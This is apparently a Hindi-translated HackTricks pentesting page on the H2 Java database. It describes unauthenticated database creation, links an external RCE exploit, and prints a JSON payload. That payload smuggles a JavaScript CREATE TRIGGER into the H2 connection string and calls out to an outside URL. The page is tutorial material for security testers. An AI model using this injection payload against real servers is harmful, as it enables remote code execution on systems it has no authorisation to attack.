Hindi - Ht

H2 - Java SQL database

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

आधिकारिक पेज: https://www.h2database.com/html/main.html

पहुंच

आप एक अस्तित्वहीन नाम एक डेटाबेस दर्ज कर सकते हैं ताकि मान्य क्रेडेंशियल के बिना एक नया डेटाबेस बनाया जा सके (अप्रमाणित):

या यदि आप जानते हैं कि उदाहरण के लिए एक mysql चल रहा है और आपको उस डेटाबेस का नाम और क्रेडेंशियल पता है, तो आप सीधे उसका उपयोग कर सकते हैं:

HTB के Hawk बॉक्स से ट्रिक।

RCE

H2 डेटाबेस के साथ संचार करने की पहुंच होने पर इस एक्सप्लॉइट को देखें जिससे आपको उस पर RCE मिल सकता है: https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

H2 SQL Injection से RCE

इस पोस्ट में एक payload का वर्णन किया गया है जिससे H2 डेटाबेस के माध्यम से RCE प्राप्त किया जा सकता है जो SQL Injection का दुरुपयोग करता है।

[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

PreviousGraphQLNextIIS - Internet Information Services

Last updated